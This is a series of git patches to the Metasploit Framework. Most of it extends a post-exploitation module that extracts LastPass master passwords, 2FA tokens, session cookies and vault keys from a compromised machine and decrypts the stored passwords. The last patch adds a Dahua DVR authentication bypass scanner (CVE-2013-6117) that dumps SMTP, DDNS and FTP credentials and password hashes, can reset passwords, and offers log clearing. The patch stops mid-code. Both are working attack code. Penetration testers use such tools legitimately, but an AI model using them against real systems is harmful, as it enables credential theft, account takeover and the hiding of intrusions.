(data.blank? || data.size != 32) # Verify content + data = windows_unprotect(data) if data != nil && data.size > 32 # Verify Windows protection loot_path = store_loot( 'firefox.preferences', 'text/binary', @@ -389,15 +392,15 @@ class Metasploit3 < Msf::Post #Print all extracted LastPass data def print_lastpass_data(account_map) lastpass_data_table = Rex::Ui::Text::Table.new( - 'Header' => "LastPass data", + 'Header' => "LastPass Accounts", 'Indent' => 1, - 'Columns' => %w(Account Browser LP_Username LP_Password LP_2FA LP_Key) + 'Columns' => %w(Account LP_Username LP_Password LP_2FA LP_Key) ) account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| lp_data['lp_creds'].each_pair do |username, user_data| - lastpass_data_table << [account, browser, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']] + lastpass_data_table << [account, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']] end end end @@ -412,6 +415,8 @@ class Metasploit3 < Msf::Post nil, "LastPass Data" ) + + print_vault_passwords(account_map) end end @@ -423,7 +428,7 @@ class Metasploit3 < Msf::Post if browser == 'Firefox' path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" iterations = read_file(path) if client.fs.file.exists?(path) #Read file if it exists - iterations = "NOT FOUND" if iterations.blank? # Verify content + iterations = nil if iterations.blank? # Verify content lp_data['lp_creds'][username]['iterations'] = iterations loot_path = store_loot( "#{browser.downcase}.lastpass.iterations", @@ -435,8 +440,8 @@ class Metasploit3 < Msf::Post ) path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" vault = read_file(path) if client.fs.file.exists?(path) #Read file if it exists - vault = "NOT FOUND" if vault.blank? # Verify content - lp_data['lp_creds'][username]['vault_loot'] = "NOT_FOUND" + vault = windows_unprotect(vault) if vault != nil && vault.match(/^AQAAA.+/) # Verify Windows protection + vault = vault.sub(/iterations=.*;/, "") # Remove iterations info loot_path = store_loot( "#{browser.downcase}.lastpass.vault", 'text/plain', @@ -445,12 +450,13 @@ class Metasploit3 < Msf::Post nil, "#{account}'s #{browser} LastPass Vault" ) + lp_data['lp_creds'][username]['vault_loot'] = loot_path else # Chrome, Safari and Opera db = SQLite3::Database.new(lp_data['lp_db_loot']) result = db.execute( "SELECT data FROM LastPassData " \ - "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'accts'" + "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'accts'" ) if result.size == 1 && !result[0].blank? @@ -478,8 +484,8 @@ class Metasploit3 < Msf::Post lp_data['lp_creds'][username]['vault_loot'] = loot_path end else - lp_data['lp_creds'][username]['iterations'] = "NOT_FOUND" - lp_data['lp_creds'][username]['vault_loot'] = "NOT_FOUND" + lp_data['lp_creds'][username]['iterations'] = nil + lp_data['lp_creds'][username]['vault_loot'] = nil end end end @@ -491,11 +497,11 @@ class Metasploit3 < Msf::Post account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| lp_data['lp_creds'].each_pair do |username, user_data| - if !user_data['lp_password'].blank? && user_data['iterations'] != "NOT_FOUND"# Derive vault key from credentials + if !user_data['lp_password'].blank? && user_data['iterations'] != nil# Derive vault key from credentials lp_data['lp_creds'][username]['vault_key'] = derive_vault_key_from_creds(username, lp_data['lp_creds'][username]['lp_password'], user_data['iterations']) else # Get vault key from disabled OTP - otp = extract_otp(account, browser, username, lp_data) - lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otp) + otpbin = extract_otpbin(account, browser, username, lp_data) + lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otpbin) end end end @@ -503,19 +509,19 @@ class Metasploit3 < Msf::Post end # Returns otp, encrypted_key - def extract_otp(account, browser, username, lp_data) + def extract_otpbin(account, browser, username, lp_data) if browser == 'Firefox' path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" - otp = read_file(path) if client.fs.file.exists?(path) #Read file if it exists - otp = "NOT FOUND" if otp.blank? # Verify content - return otp + otpbin = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + otpbin = windows_unprotect(otpbin) if otpbin != nil && otpbin.match(/^AQAAA.+/) + return otpbin else # Chrome, Safari and Opera db = SQLite3::Database.new(lp_data['lp_db_loot']) result = db.execute( "SELECT type, data FROM LastPassData " \ "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'otp'" ) - result[0][1] + [result[0][1]].pack "H*" end end @@ -524,22 +530,20 @@ class Metasploit3 < Msf::Post if key_iteration_count == 1 key = Digest::SHA256.hexdigest username + password else - key = pbkdf2(password, username, key_iteration_count.to_i, 32) + key = pbkdf2(password, username, key_iteration_count.to_i, 32).first end - key.first + key end - def decrypt_vault_key_with_otp username, otp - otpbin = [otp].pack "H*" + def decrypt_vault_key_with_otp username, otpbin vault_key_decryption_key = [lastpass_sha256(username + otpbin)].pack "H*" - encrypted_vault_key = retrieve_encrypted_vault_key_with_otp(username, otp) + encrypted_vault_key = retrieve_encrypted_vault_key_with_otp(username, otpbin) decrypt_data(vault_key_decryption_key, encrypted_vault_key) end - def retrieve_encrypted_vault_key_with_otp username, otp + def retrieve_encrypted_vault_key_with_otp username, otpbin # Derive login hash from otp - otpbin = [otp].pack "H*" otp_token = lastpass_sha256( lastpass_sha256( username + otpbin ) + otpbin ) # OTP login hash # Make request to LastPass @@ -551,10 +555,6 @@ class Metasploit3 < Msf::Post http.request(request) } - puts request.body - puts response.body - - # Parse response encrypted_vault_key = nil if response.body.match(/randkey\="(.*)"/) @@ -567,9 +567,9 @@ class Metasploit3 < Msf::Post # LastPass does some preprocessing (UTF8) when doing a SHA256 on special chars (binary) def lastpass_sha256(input) output = "" - + input = input.gsub("\r\n", "\n") - + input.each_byte do |e| if 128 > e output += e.chr @@ -587,11 +587,120 @@ class Metasploit3 < Msf::Post OpenSSL::Digest::SHA256.hexdigest(output) end - def pbkdf2(password, salt, iterations, key_length) digest = OpenSSL::Digest::SHA256.new OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, key_length, digest).unpack 'H*' - end + end + def windows_unprotect(data) + data = Base64.decode64(data) + rg = session.railgun + pid = session.sys.process.getpid + process = session.sys.process.open(pid, PROCESS_ALL_ACCESS) + mem = process.memory.allocate(data.length+200) + process.memory.write(mem, data) + + if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86" + addr = [mem].pack("V") + len = [data.length].pack("V") + ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8) + len, addr = ret["pDataOut"].unpack("V2") + else + addr = Rex::Text.pack_int64le(mem) + len = Rex::Text.pack_int64le(data.length) + ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16) + pData = ret["pDataOut"].unpack("VVVV") + len = pData[0] + (pData[1] << 32) + addr = pData[2] + (pData[3] << 32) + end + + return "" if len == 0 + process.memory.read(addr, len) + end + + def print_vault_passwords(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + lp_data['lp_creds'].each_pair do |username, user_data| + lastpass_vault_data_table = Rex::Ui::Text::Table.new( + 'Header' => "Decrypted vault from #{username}", + 'Indent' => 1, + 'Columns' => %w(URL Username Password) + ) + if user_data['vault_loot'] == nil # Was a vault found? + print_error "No vault was found for #{username}" + next + end + encoded_vault = File.read(user_data['vault_loot']) + if encoded_vault[0] == "!" # Vault is double encrypted + encoded_vault = decrypt_data([user_data['vault_key']].pack("H*"), encoded_vault) + if encoded_vault.blank? + print_error "Vault from #{username} could not be decrypted" + next + else + encoded_vault = encoded_vault.sub("LPB64", "") + end + end + + # Parse vault + vault = Base64.decode64(encoded_vault) + vault.scan(/ACCT/) do |result| + chunk_length = vault[$~.offset(0)[1]..$~.offset(0)[1]+3].unpack("H*").first.to_i(16) # Get the length in base 10 of the ACCT chunk + chunk = vault[$~.offset(0)[0]..$~.offset(0)[1]+chunk_length] # Get ACCT chunk + account_data = parse_vault_account(chunk, user_data['vault_key']) + lastpass_vault_data_table << account_data if account_data != nil + end + + unless account_map.empty? # Loot passwords + print_good lastpass_vault_data_table.to_s + path = store_loot( + "lastpass.#{username}.passwords", + "text/csv", + session, + lastpass_vault_data_table.to_csv, + nil, + "LastPass Vault Passwords from #{username}" + ) + end + end + end + end + end + + def parse_vault_account(chunk, vaultKey) + pointer = 22 # Starting position to find data to decrypt + labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"] + vault_data = [] + for label in labels + length = chunk[pointer..pointer+3].unpack("H*").first.to_i(16) + encrypted_data = chunk[pointer+4..pointer+4+length-1] + label != "url" ? decrypted_data = decrypt_vault_password(vaultKey, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") + decrypted_data = "" if decrypted_data == nil + vault_data << decrypted_data if (label == "url" || label == "username" || label == "password") + pointer = pointer + 4 + length + end + return vault_data[0] == "http://sn" ? nil : vault_data # TODO: Support secure notes + end + + def decrypt_vault_password(key, encrypted_data) + return nil if key.blank? || encrypted_data.blank? + + if encrypted_data[0] == "!" # Apply CBC + decipher = OpenSSL::Cipher.new("AES-256-CBC") + decipher.iv = encrypted_data[1, 16] # Discard ! + encrypted_data = encrypted_data[17..-1] + else # Apply ECB + decipher = OpenSSL::Cipher.new("AES-256-ECB") + end + decipher.decrypt + decipher.key = [key].pack "H*" + + begin + return decipher.update(encrypted_data) + decipher.final + rescue + vprint_error "Vault password could not be decrypted" + return nil + end + end end From 211da2746ea61200b94a96fa8bd4fa9034311558 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Wed, 11 Nov 2015 16:26:07 -0800 Subject: [PATCH 008/686] Support cookie auth key decryption --- modules/post/multi/gather/lastpass_creds.rb | 112 +++++++++++++++++--- 1 file changed, 100 insertions(+), 12 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index bcb4fa7c8b..e8377feb01 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -45,6 +45,9 @@ class Metasploit3 < Msf::Post print_status "Extracting credentials" extract_credentials(account_map) + #print_status "Decrypting local stored key" + #decrypt_local_vault_key(account_map) + print_status "Extracting 2FA tokens" extract_2fa_tokens(account_map) @@ -83,6 +86,12 @@ class Metasploit3 < Msf::Post 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" } + cookies_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Cookies", + 'Firefox' => "", + 'Opera' => "", + 'Safari' => "" + } when /unix|linux/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", @@ -94,6 +103,12 @@ class Metasploit3 < Msf::Post 'Firefox' => "#{user_profile['LocalAppData']}/.lastpass", 'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" } + cookies_path_map = { #TODO + 'Chrome' => "", + 'Firefox' => "", + 'Opera' => "", + 'Safari' => "" + } when /osx/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", @@ -107,6 +122,12 @@ class Metasploit3 < Msf::Post 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", 'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" } + cookies_path_map = { #TODO + 'Chrome' => "", + 'Firefox' => "", + 'Opera' => "", + 'Safari' => "" + } else print_error "Platform not recognized: #{platform}" end @@ -119,8 +140,12 @@ class Metasploit3 < Msf::Post account_map[account][browser]['lp_db_path'] = db_paths if session.type == "meterpreter" account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if client.fs.file.exists?(localstorage_path_map[browser]) || browser == 'Firefox' + account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if client.fs.file.exists?(cookies_path_map[browser]) || browser == 'Firefox' + #account_map[account][browser]['cookies_db'] = cookies_path_map[browser]['lp_db_path'].gsub("prefs.js", "cookies.sqlite") if client.fs.file.exists?(cookies_path_map[browser]['lp_db_path']) && browser == 'Firefox' else # session.type == "shell" account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if session.shell_command("ls \"#{localstorage_path_map[browser]}\"").strip == localstorage_path_map[browser].strip || browser == 'Firefox' + account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if session.shell_command("ls \"#{cookies_path_map[browser]}\"").strip == cookies_path_map[browser].strip || browser == 'Firefox' + #account_map[account][browser]['cookies_db'] = cookies_path_map[browser]['lp_db_path'] if session.shell_command("ls \"#{cookies_path_map[browser]['lp_db_path']}\"").strip == cookies_path_map[browser]['lp_db_path'].strip && browser == 'Firefox' end else account_map[account].delete(browser) @@ -257,7 +282,6 @@ class Metasploit3 < Msf::Post credentials end - def decrypt_data(key, encrypted_data) return nil if encrypted_data.blank? @@ -346,7 +370,6 @@ class Metasploit3 < Msf::Post end end - #Extracts the 2FA token from localStorage def extract_2fa_tokens(account_map) account_map.each_pair do |account, browser_map| @@ -388,7 +411,6 @@ class Metasploit3 < Msf::Post end end - #Print all extracted LastPass data def print_lastpass_data(account_map) lastpass_data_table = Rex::Ui::Text::Table.new( @@ -420,7 +442,6 @@ class Metasploit3 < Msf::Post end end - def extract_vault_and_iterations(account_map) account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| @@ -496,18 +517,88 @@ class Metasploit3 < Msf::Post def extract_vault_keys(account_map) account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| + browser_checked = false # Track if local stored vault key was already decrypted for this browser lp_data['lp_creds'].each_pair do |username, user_data| - if !user_data['lp_password'].blank? && user_data['iterations'] != nil# Derive vault key from credentials + if !user_data['lp_password'].blank? && user_data['iterations'] != nil # Derive vault key from credentials lp_data['lp_creds'][username]['vault_key'] = derive_vault_key_from_creds(username, lp_data['lp_creds'][username]['lp_password'], user_data['iterations']) - else # Get vault key from disabled OTP - otpbin = extract_otpbin(account, browser, username, lp_data) - lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otpbin) + else # Get vault key decrypting the locally stored one or from the disabled OTP + if !browser_checked + decrypt_local_vault_key(account, browser_map) + browser_checked = true + end + if lp_data['lp_creds'][username]['vault_key'] == nil # If not vault key was found yet, try with dOTP + otpbin = extract_otpbin(account, browser, username, lp_data) + lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otpbin) + end end end end end end + # Decrypt the locally stored vault key + def decrypt_local_vault_key account, browser_map + browser_map.each_pair do |browser, lp_data| + case browser + when /Chrome/ + query = "SELECT encrypted_value FROM cookies WHERE host_key = 'lastpass.com' AND name = 'PHPSESSID'" + when "Opera" + query = "" + when "Firefox" + query = "SELECT value FROM moz_cookies WHERE baseDomain = 'lastpass.com' AND name = 'PHPSESSID'" + when "Safari" + query = "" + else + query = nil + print_error "Browser #{browser} not recognized" + end + + data = read_file(lp_data['cookies_db']) + loot_path = store_loot( + "#{browser.downcase}.lastpass.cookies", + 'application/x-sqlite3', + session, + data, + nil, + "#{account}'s #{browser} cookies DB" + ) + + # Parsing/Querying the DB + db = SQLite3::Database.new(loot_path) + begin + result = db.execute(query) + rescue + vprint_error "No session cookie was found in #{account}'s #{browser}" + next + end + next if result.blank? # No session cookie found for this browser + session_cookie = windows_unprotect(Base64.encode64(result[0][0])) # TODO: Support other browsers/OSs + + # Use the cookie to obtain the encryption key to decrypt the vault key + uri = URI('https://lastpass.com/login_check.php') + request = Net::HTTP::Post.new(uri) + request.set_form_data("wxsessid" => URI.unescape(session_cookie),"uuid" => browser_map['lp_2fa']) + request.content_type = 'application/x-www-form-urlencoded; charset=UTF-8' + response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) { |http| http.request(request) } + + # Parse response + next if !response.body.match(/pwdeckey\="([a-z0-9]+)"/) # Session must have expired + decryption_key = OpenSSL::Digest::SHA256.hexdigest(response.body.match(/pwdeckey\="([a-z0-9]+)"/)[1]) + username = response.body.match(/lpusername="([A-Za-z0-9._%+-@]+)"/)[1] + + # Get the local encrypted vault key + db = SQLite3::Database.new(lp_data['lp_db_loot']) + result = db.execute( + "SELECT data FROM LastPassData " \ + "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'key'" + ) + encrypted_vault_key = result[0][0].split("\n")[0] + + # Decrypt the local stored key + lp_data['lp_creds'][username]['vault_key'] = decrypt_data([decryption_key].pack("H*"), encrypted_vault_key) + end + end + # Returns otp, encrypted_key def extract_otpbin(account, browser, username, lp_data) if browser == 'Firefox' @@ -525,7 +616,6 @@ class Metasploit3 < Msf::Post end end - def derive_vault_key_from_creds username, password, key_iteration_count if key_iteration_count == 1 key = Digest::SHA256.hexdigest username + password @@ -551,9 +641,7 @@ class Metasploit3 < Msf::Post request = Net::HTTP::Post.new(uri) request.set_form_data("login" => 1, "xml" => 1, "hash" => otp_token, "otpemail" => URI.escape(username), "outofbandsupported" => 1, "changepw" => otp_token) request.content_type = 'application/x-www-form-urlencoded; charset=UTF-8' - response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) {|http| - http.request(request) - } + response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) {|http| http.request(request) } # Parse response encrypted_vault_key = nil From d677a8b8719c0f3cfb03e796f4a0361625719a23 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Mon, 16 Nov 2015 13:54:44 -0500 Subject: [PATCH 009/686] Adding Dahua DVR auth bypass auxiliary scanner per CVE-2013-6117 --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 385 ++++++++++++++++++ 1 file changed, 385 insertions(+) create mode 100644 modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb new file mode 100644 index 0000000000..51d622265f --- /dev/null +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -0,0 +1,385 @@ +class Metasploit3 < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Dahua DVR Auth Bypas Scanner', + 'Version' => '$Revision: 1 $', + 'Description' => 'Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user\'s password and clears the device logs', + 'Author' => [ + 'Jake Reynolds - Depth Security', #Vulnerability Discoverer + 'Tyler Bennett - Talos Infosec' # Metasploit Module + ], + 'References' => + [ + [ 'CVE', '2013-6117' ], + [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ] + ], + 'License' => MSF_LICENSE + ) + deregister_options('RHOST') + register_options( + [ + OptString.new('USERNAME', [true, 'A username to reset', '888888']), + OptString.new('PASSWORD', [true, 'A password to reset the user with', 'abc123']), + OptBool.new('RESET', [true, 'Reset an existing user\'s pw?', 'FALSE']), + OptBool.new('CLEAR_LOGS', [true, 'Clear the DVR logs when we\'re done?', 'TRUE']), + Opt::RPORT(37777) + ], self.class) + end + + def run_host(ip) + usercount = 0 + u1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + dvr_resp = "\xb1\x00\x00\x58\x00\x00\x00\x00" + version = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + email = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + + "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + ddns = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + + "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + nas = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + + "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + channels = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + groups = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + users = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + sn = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + clear_logs = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + clear_logs2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + user = "root" + pass = " w" + user8pwhash = "4WzwxXxM" #888888 + user6pwhash = "sh15yfFM" #666666 + useradminpwhash = "6QNMIQGe" #admin + connect() + sock.put(u1) + data = sock.recv(8) + disconnect() + if data == dvr_resp + print_good("DVR FOUND: @ #{rhost}:#{rport}!") + report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "Dahua-based DVR") + connect() + sock.put(version) + data = sock.get(1024) + if data =~ /[\x00]{8,}([[:print:]]+)/ + ver = $1 + print_status("Version: #{ver} @ #{rhost}:#{rport}!") + end + + sock.put(sn) + data = sock.get(1024) + if data =~ /[\x00]{8,}([[:print:]]+)/ + serial = $1 + print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") + end + + sock.put(email) + if data = sock.get(1024).split('&&') + print_status("Email Settings: @ #{rhost}:#{rport}!") + if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ + if mailhost = $1.split(':') + print_status(" Server: #{mailhost[0]}") if !mailhost[0].nil? + print_status(" Destination Email: #{data[1]}") if !mailhost[1].nil? + end + if !data[5].nil? and !data[6].nil? + print_good(" SMTP User: #{data[5]}") if !data[5].nil? + print_good(" SMTP Password: #{data[6]}") if !data[6].nil? + muser = "#{data[5]}" + mpass = "#{data[6]}" + mailserver = "#{mailhost[0]}" + print_good("MailServer: #{mailserver}") + #destemail = "#{data[1]}" if !mailhost[1].nil? + if !mailserver.to_s.strip.length == 0 and !muser.to_s.strip.length == 0 and !mpass.to_s.strip.length == 0 + report_email_creds(mailserver, rport, muser, mpass) if ( !mailserver.nil? and !muser.nil? and !mpass.nil? ) + end + end + end + end + + sock.put(ddns) + if data = sock.get(1024) + data = data.split(/&&[0-1]&&/) + data.each_with_index { + |val, index| + if index > 0 + val = val.split("&&") + ddns_service = "#{val[0]}" + ddns_server = "#{val[1]}" + ddns_port = "#{val[2]}" + ddns_domain = "#{val[3]}" + ddns_user = "#{val[4]}" + ddns_pass = "#{val[5]}" + print_status("DDNS Settings @ #{rhost}:#{rport}!:") + print_status(" DDNS Service: #{ddns_service}") if !val.nil? + print_status(" DDNS Server: #{ddns_server}") if !val.nil? + print_status(" DDNS Port: #{ddns_port}") if !val.nil? + print_status(" Domain: #{ddns_domain}") if !val.nil? + print_good(" Username: #{ddns_user}") if !val.nil? + print_good(" Password: #{ddns_pass}") if !val.nil? + if !ddns_server.to_s.strip.length == 0 and !ddns_port.to_s.strip.length == 0 and !ddns_user.to_s.strip.length == 0 and !ddns_pass.to_s.strip.length == 0 + + report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) + end + end + } + end + + sock.put(nas) + if data = sock.get(1024) + print_status("Nas Settings @ #{rhost}:#{rport}!:") + server = '' + port = '' + if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ + server = $1.unpack('C*').join('.') + port = $2.unpack('S') + print_status(" Nas Server #{server}") + print_status(" Nas Port: #{port}") + end + if data =~ /[\x00]{16,}([[:print:]]+)[\x00]{16,}([[:print:]]+)/ + ftpuser = $1 + ftppass = $2 + print_good(" FTP User: #{ftpuser}") + print_good(" FTP Password: #{ftppass}") + if !ftpuser..to_s.strip.length == 0 and ftppass.to_s.strip.length == 0 + report_creds(:host => server, :port => port, :user => ftpuser, :pass => ftppass, :type => "FTP", + :active => true) if ( !server.nil? and !port.nil? and !ftpuser.nil? and !ftppass.nil? ) + end + end + end + + sock.put(channels) + data = sock.get(1024).split('&&') + disconnect() + if (data.length > 1) + print_status("Camera Channels @ #{rhost}:#{rport}!:") + data.each_with_index { + |val, index| + print_status(" #{index+1}:#{val[/([[:print:]]+)/]}") + } + end + connect() + sock.put(users) + if data = sock.get(1024).split('&&') + print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") + data.each { + |val| + usercount += 1 + pass = "#{val[/(([\d]+)[:]([0-9A-Za-z]+)[:]([0-9A-Za-z]+))/]}" + value = pass.split(":") + username = "#{value[1]}" + md5hash = "#{value[2]}" + print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") + # Write the dahua hash to the database + hash = "#{rhost} #{username}:$dahua$#{md5hash}" + report_hash(ip, rport, user, hash) + # Write the vulnerability to the database + #unless reported_vuln + report_vuln( + :host => rhost, + :port => rport, + :proto => 'tcp', + :sname => 'dvr', + :name => 'Dahua Authentication Password Hash Exposure', + :info => "Obtained password hash for user #{username}: #{md5hash}", + :refs => self.references + ) + } + end + sock.put(groups) + if data = sock.get(1024).split('&&') + print_status("User Groups: @ #{rhost}:#{rport}!") + data.each { + |val| + print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") + } + end + if (datastore['RESET']) + userstring = datastore['USERNAME'] + ":Intel:" + datastore['PASSWORD'] + + ":" + datastore['PASSWORD'] + u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + userstring + sock.put(u1) + data = sock.get(1024) + sock.put(u2) + data = sock.get(1024) + sock.put(u3) + data = sock.get(1024) + sock.put(u1) + if data = sock.get(1024) + print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") + end +# elsif (datastore['ACTION'] == "DELETE") +# u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + +# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +# u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + +# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +# delete = "\xa6\x00\x00\x00#{datastore['USERNAME'].length.chr}\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" + +# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + +# datastore['USERNAME'] +# print delete +# sock.send(u1, 0) +# sock.get_once +# sock.send(delete, 0) +# sock.get_once +# sock.send(u2, 0) +# sock.get_once +# +# +# elsif (datastore['ACTION'] == "ADD") +# userstring = (usercount + 1).to_s + ":" + datastore['USERNAME'] + ":" + datastore['PASSWORD'] +# userstring << "\x3a\x31\x3a\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37" + +# 